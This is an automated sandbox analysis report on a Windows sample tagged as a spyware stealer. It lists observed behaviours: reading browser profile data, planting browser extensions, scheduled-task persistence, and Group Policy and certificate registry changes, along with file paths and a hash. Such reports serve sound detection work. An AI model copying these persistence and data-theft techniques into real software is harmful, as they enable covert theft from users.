Malware Analysis Report

2025-08-11 06:23

Sample ID 240403-mrle4acc4x
Target 4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded
SHA256 4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded
Tags
discovery spyware stealer
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded

Threat Level: Likely malicious

The file 4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded was found to be: Likely malicious.

Malicious Activity Summary

discovery spyware stealer

Blocklisted process makes network request

Loads dropped DLL

Checks BIOS information in registry

Checks computer location settings

Reads user/profile data of web browsers

Executes dropped EXE

Drops desktop.ini file(s)

Checks installed software on the system

Drops Chrome extension

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-03 10:41

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-03 10:41

Reported

2024-04-03 10:44

Platform

win10v2004-20240226-en

Max time kernel

150s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\EgorIPt.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\EgorIPt.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
File created C:\Program Files (x86)\LCifMpYymZWU2\ueYJqSK.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
File created C:\Program Files (x86)\yvWovCiVU\XssxXq.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
File created C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\xEVrliM.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
File created C:\Program Files (x86)\mVqQIGUXDOgrC\DzMHvAX.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
File created C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\UZvEQmh.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
File created C:\Program Files (x86)\mVqQIGUXDOgrC\TowwiFL.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
File created C:\Program Files (x86)\gbPxNkbXHfUn\yvOaXHv.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
File created C:\Program Files (x86)\yvWovCiVU\XVlIWUm.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
File created C:\Program Files (x86)\LCifMpYymZWU2\lXgsaswxXXnqT.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bCAdHbOFiqtMCRhbmR.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\eGwAoTnpAObQfPU.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\kkPqOHrufYpxTagPJ.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{64fb06ed-0000-0000-0000-d01200000000}\MaxCapacity = "14116" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{64fb06ed-0000-0000-0000-d01200000000} C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "4" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe N/A
